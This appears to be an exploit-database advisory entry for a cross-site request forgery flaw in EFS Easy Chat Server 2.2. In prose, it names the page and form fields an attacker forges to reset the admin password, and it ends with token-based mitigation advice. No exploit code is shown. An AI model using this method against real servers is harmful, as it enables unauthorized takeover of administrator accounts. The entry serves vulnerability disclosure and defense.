vendor:
Easy Chat Server
by:
Mountassif Moad
8.8
CVSS
HIGH
Cross-Site Request Forgery (XSRF)
352
CWE
Product Name: Easy Chat Server
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE: N/A
CPE: 2.2:echatserver.com:ecssetup.exe
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2007
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
This exploit allows an attacker to change the admin password of EFS Easy Chat Server version 2.2 by submitting a malicious POST request to the registresult.htm page. The malicious request contains the username, password, confirm password, email and resume fields which are used to change the admin password. The attacker can then use the new credentials to gain access to the server.
Mitigation:
The application should use a secure random token to verify the authenticity of the request. The token should be stored in a secure cookie and should be checked against the server-side token before processing the request.
